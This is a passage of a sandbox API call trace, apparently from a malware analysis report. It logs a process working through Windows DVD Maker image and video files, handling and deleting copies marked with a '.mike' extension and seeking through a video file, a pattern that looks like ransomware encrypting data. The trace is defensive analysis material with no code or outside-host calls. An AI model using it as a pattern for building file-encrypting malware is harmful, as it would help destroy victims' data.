(lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png", dwFileAttributes=0x80) returned 0 [0059.363] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png.mike")) returned 1 [0059.365] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.368] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.368] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png.mike")) returned 1 [0059.370] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.374] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.374] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png.mike")) returned 1 [0059.375] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.379] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.379] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png.mike")) returned 1 [0059.381] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.386] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.386] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png.mike")) returned 1 [0059.387] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.391] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0059.391] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png.mike")) returned 1 [0059.393] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.398] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.398] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png.mike")) returned 1 [0059.400] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.404] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png", dwFileAttributes=0x80) returned 0 [0059.405] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png.mike")) returned 1 [0059.406] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.412] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png", dwFileAttributes=0x80) returned 0 [0059.413] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png.mike")) returned 1 [0059.414] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.431] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png", dwFileAttributes=0x80) returned 0 [0059.431] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png.mike")) returned 1 [0059.433] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0059.433] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.433] CoTaskMemFree (pv=0x4e1c10) [0059.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.440] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.443] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.444] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png.mike")) returned 1 [0059.445] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.451] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png", dwFileAttributes=0x80) returned 0 [0059.451] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png.mike")) returned 1 [0059.453] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.459] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png", dwFileAttributes=0x80) returned 0 [0059.459] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png.mike")) returned 1 [0059.460] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.464] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.464] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png.mike")) returned 1 [0059.465] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.469] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0059.469] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png.mike")) returned 1 [0059.471] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.476] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0059.476] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png.mike")) returned 1 [0059.477] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.481] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0059.481] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png.mike")) returned 1 [0059.482] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.486] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png", dwFileAttributes=0x80) returned 0 [0059.486] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png.mike")) returned 1 [0059.488] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.491] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png", dwFileAttributes=0x80) returned 0 [0059.491] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png.mike")) returned 1 [0059.493] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0059.497] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png", dwFileAttributes=0x80) returned 0 [0059.497] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png.mike")) returned 1 [0059.498] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0060.334] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv", dwFileAttributes=0x80) returned 0 [0060.336] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.mike")) returned 1 [0060.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0061.100] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0061.100] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.mike")) returned 1 [0061.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0061.323] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0061.323] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.mike")) returned 1 [0061.329] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0061.568] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0061.568] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.mike")) returned 1 [0061.574] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0061.771] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0061.771] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.mike")) returned 1 [0061.776] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0062.005] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0062.006] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.mike")) returned 1 [0062.012] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0063.146] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv", dwFileAttributes=0x80) returned 0 [0063.148] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.mike")) returned 1 [0063.154] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0063.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.480] SetFilePointer (in: hFile=0x288, lDistanceToMove=2437120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x253000 [0063.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.482] SetFilePointer (in: hFile=0x288, lDistanceToMove=2447360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x255800 [0063.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.484] SetFilePointer (in: hFile=0x288, lDistanceToMove=2457600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x258000 [0063.485] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.485] SetFilePointer (in: hFile=0x288, lDistanceToMove=2467840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25a800 [0063.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.487] SetFilePointer (in: hFile=0x288, lDistanceToMove=2478080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25d000 [0063.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.488] SetFilePointer (in: hFile=0x288, lDistanceToMove=2488320, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25f800 [0063.490] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.490] SetFilePointer (in: hFile=0x288, lDistanceToMove=2498560, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x262000 [0063.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.492] SetFilePointer (in: hFile=0x288, lDistanceToMove=2508800, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x264800 [0063.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.494] SetFilePointer (in: hFile=0x288, lDistanceToMove=2519040, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x267000 [0063.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.495] SetFilePointer (in: hFile=0x288, lDistanceToMove=2529280, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x269800 [0063.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.497] SetFilePointer (in: hFile=0x288, lDistanceToMove=2539520, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x26c000 [0063.500] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD 